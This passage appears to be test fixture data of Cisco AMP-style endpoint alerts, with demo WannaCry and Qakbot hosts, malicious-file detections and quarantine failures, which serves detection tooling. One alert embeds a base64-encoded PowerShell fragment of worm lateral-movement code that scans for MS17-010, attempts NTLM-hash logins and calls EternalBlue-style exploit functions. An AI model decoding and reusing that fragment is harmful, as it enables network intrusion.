AgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831755","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831754","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":873000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831753","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qeriuwjhrf","file_path":"\\\\?\\C:\\Windows\\qeriuwjhrf","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":732000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":573000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870786","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"","file_path":"","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36c